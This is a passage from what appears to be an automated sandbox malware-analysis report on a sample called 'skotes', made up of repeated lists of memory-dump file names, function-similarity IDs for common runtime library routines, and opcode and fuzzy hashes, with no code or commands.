                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225279090.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225572927.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225657582.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225758100.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225783831.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225840476.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225840476.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225942676.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225988723.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226005704.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226022713.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226039783.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226056811.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226077921.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226094470.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226109889.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226125265.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226140557.0000000000699000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226154213.000000000069A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226170008.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226194580.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226211891.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226230667.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226252851.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226275489.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226294618.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226315018.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226331084.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226352626.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226368505.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226384464.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226400933.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226416513.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226434118.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226455642.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226478790.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226571879.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226593603.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226611832.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226611832.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226656798.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226675931.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226690703.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226706831.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226722414.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226740940.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226757505.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 57040152-0
                                                                                                                                                                                                                                                  • Opcode ID: 3a685fd12f452c66a0821da95456c069517b0af18dd6eef546e33561ce955c1b
                                                                                                                                                                                                                                                  • Instruction ID: c9939a31456e5df7b4cef7da24ec50ac9bf37f303336147a4b98d8f7d8c07654
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a685fd12f452c66a0821da95456c069517b0af18dd6eef546e33561ce955c1b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9EA1F170A012459FDB20EF65C944B9BB7A8FF14315F04856FE809D7381EB39EA04DBA9
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2224996195.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2224670067.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2224996195.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225159080.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225176441.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225279090.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225572927.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225657582.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225758100.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225783831.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225840476.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225840476.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225942676.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225988723.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226005704.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226022713.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226039783.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226056811.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226077921.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226094470.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226109889.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226125265.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226140557.0000000000699000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226154213.000000000069A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226170008.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226194580.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226211891.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226230667.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226252851.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226275489.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226294618.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226315018.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226331084.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226352626.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226368505.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226384464.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226400933.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226416513.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226434118.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226455642.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226478790.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226571879.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226593603.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226611832.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226611832.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226656798.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226675931.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226690703.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226706831.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226722414.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226740940.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226757505.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _strrchr
                                                                                                                                                                                                                                                  • String ID: vJ
                                                                                                                                                                                                                                                  • API String ID: 3213747228-190702178
                                                                                                                                                                                                                                                  • Opcode ID: ff3b895da8359e455593cab76a85431316fff6c614e69054163c5cc9de6e39d3
                                                                                                                                                                                                                                                  • Instruction ID: 56daa811097e1f2e94d492957541666e5f85402896b33f7f032b7f44b67f54e2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff3b895da8359e455593cab76a85431316fff6c614e69054163c5cc9de6e39d3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EFB1F2329042459FDB158F28C8C17AFBBE5EF66354F14816BD855EB341D6389D02CBA8
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2224996195.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2224670067.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2224996195.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225159080.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225176441.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225279090.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225572927.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225657582.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225758100.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225783831.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225840476.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225840476.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225942676.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225988723.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226005704.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226022713.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226039783.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226056811.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226077921.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226094470.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226109889.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226125265.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226140557.0000000000699000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226154213.000000000069A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226170008.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226194580.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226211891.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226230667.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226252851.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226275489.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226294618.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226315018.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226331084.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226352626.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226368505.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226384464.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226400933.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226416513.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226434118.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226455642.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226478790.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226571879.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226593603.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226611832.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226611832.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226656798.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226675931.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226690703.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226706831.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226722414.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226740940.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226757505.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 531285432-0
                                                                                                                                                                                                                                                  • Opcode ID: 3aa8a530b6d951df87780cc676ad299d8d8449b7a1b4f5d82b9175d8203a53b1
                                                                                                                                                                                                                                                  • Instruction ID: 601e35367c1452bf4fb48eb5ea6fac57bb75b905bf46983718ed5679f12a39c4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3aa8a530b6d951df87780cc676ad299d8d8449b7a1b4f5d82b9175d8203a53b1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB211D75A00119AFDF01FFA5D8819BEB7B9EF08714F10046AFA01B7291DB389D019BA5
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2224996195.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2224670067.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2224996195.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225159080.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225176441.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225279090.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225572927.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225657582.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225758100.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225783831.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225840476.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225840476.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225942676.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2225988723.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226005704.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226022713.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226039783.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226056811.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226077921.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226094470.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226109889.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226125265.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226140557.0000000000699000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226154213.000000000069A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226170008.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226194580.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226211891.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226230667.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226252851.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226275489.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226294618.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226315018.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226331084.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226352626.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226368505.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226384464.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226400933.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226416513.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226434118.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226455642.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226478790.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226571879.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226593603.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226611832.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226611832.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2226656798.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
